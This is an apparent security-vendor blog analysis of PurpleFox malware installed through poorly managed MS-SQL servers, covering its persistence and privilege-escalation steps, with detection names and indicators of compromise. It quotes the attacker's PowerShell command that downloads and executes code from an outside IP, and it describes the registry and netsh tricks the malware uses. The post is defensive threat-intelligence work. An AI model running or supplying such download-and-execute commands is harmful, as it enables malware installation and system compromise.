Using AhnLab Smart Defense (ASD) infrastructure, AhnLab Security Emergency response Center (ASEC) has recently discovered the PurpleFox malware being installed on poorly managed MS-SQL servers. PurpleFox is a Loader that downloads additional malware and is known to mainly install CoinMiners. Particular caution is advised because the malware also includes a rootkit feature to conceal itself.
The initial infiltration method of the recently identified PurpleFox malware involves targeting poorly managed MS-SQL servers. The threat actor executed PowerShell through sqlservr.exe, which is a process related to MS-SQL servers (see Figure 1).
Figure 1. PowerShell command executed by the MS-SQL server process (sqlservr.exe)- PowerShell command: powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp://64.227.152[.]193:18336/57BC9B7E.Png’);MsiMake hxxp://64.227.152[.]193:18336/2E0ECB2F.Png”
When the above PowerShell command is executed, an obfuscated PowerShell is downloaded from the URL “hxxp://64,227,152[.]193:18336/57BC9B7E.Png” and loaded. The downloaded PowerShell contains MsiMake, a function written by the threat actor (see Figure 2). Afterward, an MSI file is downloaded from the URL “hxxp://64.227.152[.]193:18336/2E0ECB2F.Png”. The MsiMake command is executed in the system to install this MSI file.
- 57BC9B7E.Png: Obfuscated PowerShell
- 2E0ECB2F.Png: PurpleFox (MSI file)
Figure 2. PowerShell decryption codeThe file 57BC9B7E.Png not only installs MSI files but also contains within its scripts a vulnerability-invoking executable and a PowerShell script (Invoke-Tater). It also has another PowerShell script to execute the aforementioned two files in the fileless format (Invoke-ReflectivePEInjection). As a result, the threat actor can install a malicious MSI file as an admin without user intervention using the PowerShell code in 57BC9B7E.Png.
The MSI file changes a registry key to execute the PurpleFox malware with service privilege and to maintain its persistence. AhnLab’s Endpoint Detection & Response (EDR) detects the initial access of PurpleFox (installing an MSI file using PowerShell) as well as its privilege escalation and persistence maintenance stages. Security managers operating EDR products can proactively block attacks from threat actors by blocking the malware distribution points based on the detection logs.
[1] Initial Access & Execution
The threat actor approached poorly-managed MS-SQL servers and used the sqlservr.exe process to execute PowerShell. AhnLab EDR detects the suspicious PowerShell command used by the threat actor under the detection name “Execution/MDP.Powershell.M10668”.
Figure 3. Screen showing the detection of PowerShell being executed by the sqlservr.exe process[2] Persistence & Privilege Escalation
When the obfuscated PowerShell is executed, it installs the MSI file. The MSI package file changes a registry key for persistence and privilege escalation. The registry entry modified by the threat actor is the PendingFileRenameOperations value in the key “HKLM\SYSTEM\CurrentControlSet\Control\Session Manager”.
Figure 4. Screen showing the detection of the registry modification behaviorUsing this technique, tasks can be scheduled to delete or rename certain files. That is, a threat actor can employ this technique to change the malware file (setupact64.log) to have a normal file name (sens.dll) and run it as a service after a system reboot.
* sens.dll is the file name of a normal DLL file used in the NetWork service group.
Figure 5. netsvc group listAdditionally, the MSI package used the netsh utility to add an IPSec policy on a certain port. This port is the one allocated to sharing resources between systems in the network (135-RPC, 139-NetBIOS, 445-CIFS/SMB) and is the main (vulnerable) port used when the malware connects to the Internet.
Figure 6. Screen showing the detection of network settings being changed
Figure 7. netsh.exe process execution diagramAfter the registry key is changed and the port policy is added, the MSI package attempts to reboot the system. After a reboot, the System Event Notification System service (SENS service) is executed, activating the malware. The malware executes a rootkit and additionally registers a service to be run in safe mode.
Figure 8. Screen showing the detection of the rootkit and registering a service to be run in safe mode[3] Conclusion
Security managers operating EDR products can use EDR to check the techniques employed by the threat actor from initial access to maintaining persistence and privilege escalation. Particularly, it becomes possible to identify how the threat actor was able to infiltrate the system. Based on this information, the company’s vulnerable systems can be supplemented to actively respond to threats from attackers.
[IoC]
[MD5]
f725bab929df4fe2626849ba269b7fcb // MSI package
d88a9237dd21653ebb155b035aa9a33c // Obfuscated PowerShell
[URL]
hxxp://64.227.152[.]193:18336/57BC9B7E.Png
hxxp://64.227.152[.]193:18336/2E0ECB2F.Png
[File Detection]
Dropper/MSI.Purplefox (2023.06.27.02)
Trojan/Powershell.Inject (2023.07.12.02)
[Behavior Detection]
Execution/MDP.Powershell.M2514
Execution/MDP.Powershell.M10668
AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.
The post PurpleFox Being Distributed via MS-SQL Servers appeared first on ASEC BLOG.
Article Link: PurpleFox Being Distributed via MS-SQL Servers - ASEC BLOG